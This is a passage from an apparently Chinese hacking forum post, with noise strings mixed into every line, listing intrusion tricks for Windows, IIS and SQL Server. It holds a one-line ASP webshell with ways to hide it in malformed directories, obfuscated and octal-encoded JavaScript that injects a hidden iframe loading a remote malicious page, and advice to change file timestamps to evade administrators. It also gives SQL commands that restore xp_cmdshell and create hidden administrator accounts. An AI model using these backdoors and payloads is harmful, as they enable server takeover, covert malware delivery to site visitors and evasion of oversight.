4 a1 j2 t7 Y C$ f3 o, B5 Q用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
% | ~. S+ z+ M* [% K/ s
& Q5 I$ s2 T, a0 z( H53、隐藏ASP后门的两种方法
/ S: {# c4 |, Q' t1 \* J2 r$ Y1、建立非标准目录:mkdir images..\ R4 }" A/ Z1 `
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
; Q( [( z& O1 h9 G9 I" g$ N2 P# m通过web访问ASP木马:http://ip/images../news.asp?action=login
$ W. v0 {0 e2 a3 i7 X/ c# ]" ^3 l如何删除非标准目录:rmdir images..\ /s) A) y' e" T# _5 y6 x7 _! s: d1 ~
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 ^. s! y' @2 z3 _ Mmkdir programme.asp
5 z; o R8 J- T9 M* P. b! n! |; I新建1.txt文件内容:<!--#include file=”12.jpg”-->) o2 l& B2 R, M. l
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件( I$ g- m, Z% \- L- m) a
attrib +H +S programme.asp
2 H- W9 h* V: a8 r# |通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt. W* C/ ?( G) Z$ v
3 V, O4 U9 `& H; V5 ?54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。8 P7 O7 g" D- _
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; m( R" \1 P9 U- g
) k7 b6 r# s. a8 q+ E
55、JS隐蔽挂马
) H3 t. j( A, f, R( d$ `1.( v7 W5 d4 _5 R, z+ K3 K9 I
var tr4c3="<iframe src=ht";
* e8 s5 |9 {& J d; c/ Etr4c3 = tr4c3+"tp:/";/ T2 j) m1 H: o) Y( h
tr4c3 = tr4c3+"/ww";' c C" L1 H: G0 J) h) c% N
tr4c3 = tr4c3+"w.tr4";: i( Z3 d+ C# e+ o8 k
tr4c3 = tr4c3+"c3.com/inc/m";* t- _4 f: I; ?: L
tr4c3 = tr4c3+"m.htm style="display:none"></i";5 y2 W# r0 z: e2 B
tr4c3 =tr4c3+"frame>'";
7 U1 B+ [3 d$ \* Pdocument.write(tr4c3);
' R/ ?6 ?9 C+ b1 d2 Q$ g# l/ K& x避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。# Z6 l, ]$ x- w l! U
8 F9 `# S% Y9 ^/ O' L: |* d2.3 u, L' m4 _# Z0 n, D2 A" B3 V
转换进制,然后用EVAL执行。如
5 p( ~, D* P$ Z" L0 A2 N2 Zeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");5 N# m- d- A4 x* k9 L6 r' W- d
不过这个有点显眼。/ S: W& A( m; l" y& A# l! d
3.$ c, N& z q: `
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');" |. c4 d9 [$ r( S' W: m
最后一点,别忘了把文件的时间也修改下。
# v: ?2 U. z( `* m9 ?
' c4 R5 P/ H2 A- R5 _3 h" W7 g/ L2 U56.3389终端入侵常用DOS命令
8 |) z# R+ C) }' @: p# |, M4 Gtaskkill taskkill /PID 1248 /t
, _; W, n) h3 G# S9 ^
; T: ?$ }; c7 \8 z5 [$ Z' f) Itasklist 查进程5 t$ E, t* W7 {8 q1 y
, g; O; y& T% _3 R" a
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
4 ~# E+ x& }4 o0 piisreset /reboot, @ `% j. i6 J$ ~) q
tsshutdn /reboot /delay:1 重起服务器 v3 [5 ]" D( `
0 `2 w6 v5 z: n: Ylogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, c m5 s& v+ J7 K" M; d8 Z
J" M3 s& e7 G+ @) }6 x' p+ V5 ^query user 查看当前终端用户在线情况2 I# J" \. W( v! @# a i
' H# v m5 ?. T& `
要显示有关所有会话使用的进程的信息,请键入:query process *9 r7 ?* Y, {3 m, r
9 o& s$ ]; _/ H6 E$ e
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, x/ k: G8 u7 `( g1 {
- R _7 ]+ a" t( ?' _要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2- D/ |' B, \( Z9 b8 t0 o
; s) J9 w; v$ E要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
k M: d2 l, m9 B5 j9 n; G4 N
! \/ n. }0 N3 g# ]命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 i# ?, Y8 n8 z7 \4 d3 l4 T
3 K! I }8 t; o/ O
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
/ Y: Y& b- ^+ J6 J4 N; |4 `5 p# i8 `$ F3 _
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。" T8 a! z/ \( A/ ]9 X, H
8 V7 V: d3 t% H+ }
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ N( j+ T9 l, {1 G, U( ^$ L
( N* G k* I S+ p- t/ y& `5 W, z P$ |56、在地址栏或按Ctrl+O,输入:
0 ^1 t! A! |2 u& R( H8 v- Zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 A! ]+ Z" q) H+ m1 n+ f
3 H9 q5 B+ ]' N* n6 s. D1 [
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。- D- F8 U' Z& ?) I
6 { N! {. @' g% s9 K$ }/ J57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 O0 q4 X1 i, P3 h1 Q1 W2 I
用net localgroup administrators是可以看到管理组下,加了$的用户的。$ A, x5 V2 E' u! p
$ C; y7 m3 M: B2 H: q# W7 d
58、 sa弱口令相关命令0 H2 [' P" G. r5 x
4 {+ ` A. K+ ?/ u# T# _7 k
一.更改sa口令方法:& L6 }1 x2 ?, k I# s, A
用sql综合利用工具连接后,执行命令:
J8 Z% C# d2 `+ I0 J: yexec sp_password NULL,'20001001','sa'( H; I% g" Q' e( Y- t& J: J, F3 ^
(提示:慎用!)* l/ z j; |+ G' S; o# b& A
* S) c" M" p/ d+ y" B( s) f二.简单修补sa弱口令.5 [; s$ D" w" M! q% p: H/ l
7 b6 D/ a" \: p* V
方法1:查询分离器连接后执行:3 a- _! z4 g# o) J. Y
if exists (select * from6 |$ y" X0 b$ N V* m/ k3 Z
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and% O) P3 q' x# w
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 F. s! i8 {/ ]6 f/ `5 c: `/ D. R. F3 p n8 t7 [
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; Y& }: X+ J( ^% ]; T( A
( m, U0 F& P5 z9 G# m tGO' Q9 A0 { g; h
@' M" O" J- f7 b然后按F5键命令执行完毕
) E( P& ?9 C# V5 \1 W6 \# ~0 V9 B. @/ x( ^5 h4 _1 i9 o, u% E" |
方法2:查询分离器连接后
4 l: B4 }) U) _ c2 B第一步执行:use master
' ]5 q/ i! a/ t7 `# L+ Y. R/ q0 r第二步执行:sp_dropextendedproc 'xp_cmdshell'% u+ w) _) _7 O. U5 j
然后按F5键命令执行完毕
8 ~+ Q/ _' m# I9 K$ M% T
! J) N% ]2 A, }& E+ W9 f. G2 A# b
& |! [ r; p, k% e8 A g* D三.常见情况恢复执行xp_cmdshell.
9 k3 M" @2 g# n8 Z# c
4 b( o1 B0 A2 I$ _- i; J' p' ] O R" ]" I# V
1 未能找到存储过程'master..xpcmdshell'.4 b; A, N. e" s' ?2 G4 D M
恢复方法:查询分离器连接后,& ~8 c) t& b, C+ Y# m( N
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
) F6 {1 M& q" C% n7 n) j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ V7 ^3 b0 O2 w: l1 _0 ~然后按F5键命令执行完毕
/ E2 m# z7 J+ z* E& ]( t1 R0 K0 Y' Z! d ~& j6 t; H# c9 {, ]
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); G" q9 W/ g8 I0 y( o
恢复方法:查询分离器连接后,4 q/ i! P9 z6 S+ @
第一步执行:sp_dropextendedproc "xp_cmdshell"+ F0 ], Y% O! v9 m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 e2 |$ _4 v6 u+ I然后按F5键命令执行完毕/ F r$ e9 D4 J `
9 G% k- V3 P V' A3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. }8 n. q5 d- b% z恢复方法:查询分离器连接后,
& N3 F: o& b9 e! h: E x第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' q0 b: }& R" X$ c$ u6 N( C% V第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
* a q/ O* Z' x; t A+ r, a5 U& V! Z然后按F5键命令执行完毕 g# X! z8 h& ^
5 _& K/ E l5 v; Q8 A, m Z* m四.终极方法.8 @' h3 X ]; }* O9 [0 y
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:% c6 M% \* [& l! V
查询分离器连接后,8 u" [' y. a* T" C
2000servser系统:
$ g$ W$ i; B7 ~ gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) s/ d- b9 [* H6 ]& J8 V; b3 g' X2 i" A, p8 O) y' _. |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: g8 i. t0 x" B" L* R
- Q' S& ^" E- H! m- _xp或2003server系统:5 |/ K0 k7 s. S0 n% z7 d7 L
- f" ~* V( L3 @4 W* {: E Y6 n. N4 U: s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ W' {* C" y4 O/ R* S
3 f8 ~( c* |" E/ D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 p) p8 q( p8 R: j$ x8 O
|
发表于 2012-9-15 14:13:15
收藏
支持
反对